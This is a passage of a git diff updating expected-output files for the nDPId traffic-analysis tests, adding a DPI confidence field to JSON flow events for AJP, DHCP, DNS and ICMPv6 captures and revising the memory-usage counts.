-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","total-events-serialized":38}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 38/26
@@ -44,9 +44,9 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596783 bytes
-~~ total memory freed........: 4596783 bytes
-~~ total allocations/frees...: 99582/99582
+~~ total memory allocated....: 4681408 bytes
+~~ total memory freed........: 4681408 bytes
+~~ total allocations/frees...: 101172/101172
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
 ~~ json string max len.......: 1500 chars
diff --git a/test/results/alexa-app.pcapng.out b/test/results/alexa-app.pcapng.out
index fce02b589..108c067c7 100644
--- a/test/results/alexa-app.pcapng.out
+++ b/test/results/alexa-app.pcapng.out
@@ -5,148 +5,148 @@
 00167{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":6}
 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490976022731,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"}
-00574{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490976022731,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"}
 00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490976022741,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1490976022741,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHL0AAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"}
-00565{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490976022741,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1490976022741,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHL0AAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490976023264,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"ts_msec":1490976023264,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCCABFAAFX84EAAEARhhUAAAAA\/\/\/\/\/wBEAEMBQ5j9AQEGAHxtfzEAAAAAAAAAAAAAAAAAAAAAAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBePiC0\/vCMgSsECrYOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLTFjMTMzNWVjOTVhMjczMTg3CgEhAwYPGhwzOjv\/"}
-00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"android-1c1335ec95a27318","fingerprint":"1,33,3,6,15,26,28","class_ident":"dhcpcd-5.5.6"}}
+00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"android-1c1335ec95a27318","fingerprint":"1,33,3,6,15,26,28","class_ident":"dhcpcd-5.5.6"}}
 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490976023264,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"ts_msec":1490976023264,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCCABFAAFX84EAAEARhhUAAAAA\/\/\/\/\/wBEAEMBQ5j9AQEGAHxtfzEAAAAAAAAAAAAAAAAAAAAAAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBePiC0\/vCMgSsECrYOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLTFjMTMzNWVjOTVhMjczMTg3CgEhAwYPGhwzOjv\/"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1490976023267,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1490976023267,"pkt":"ePiC0\/vCAMDKkaPvCABFAAFIz1MAAEAR\/VesECoBrBAq2ABDAEQBNCIdAgEGAHxtfzEAAAAAAAAAAKwQKtisECoBAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgSsECoBMwQAAKjAOgQAAFRgOwQAAJOoAQT\/\/\/8AHASsECr\/AwSsECoBBgSsECoBDwNsYW7\/AAAA"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1490976023731,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1490976023731,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="}
-00588{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1490976023731,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1490976023731,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1490976024793,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1490976024793,"pkt":"AMDKkaPvePiC0\/vCCABFAABLWklAAEARM1+sECrYrBAqAQ1wADUAN5pbXVABAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAAcAAE="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1490976024844,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"ts_msec":1490976024844,"pkt":"ePiC0\/vCAMDKkaPvCABFAABnz+xAAEARvZ+sECoBrBAq2AA1DXAAU9tZXVCBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAAcAAHADAAcAAEAAAErABAmB\/iwQAAIEwAAAAAAACAO"}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976024844,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.7.248.176"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976024844,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.7.248.176"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1490976024847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1490976024847,"pkt":"AMDKkaPvePiC0\/vCCABFAABLWkpAAEARM16sECrYrBAqAdlDADUAN19T54QBAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAE="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
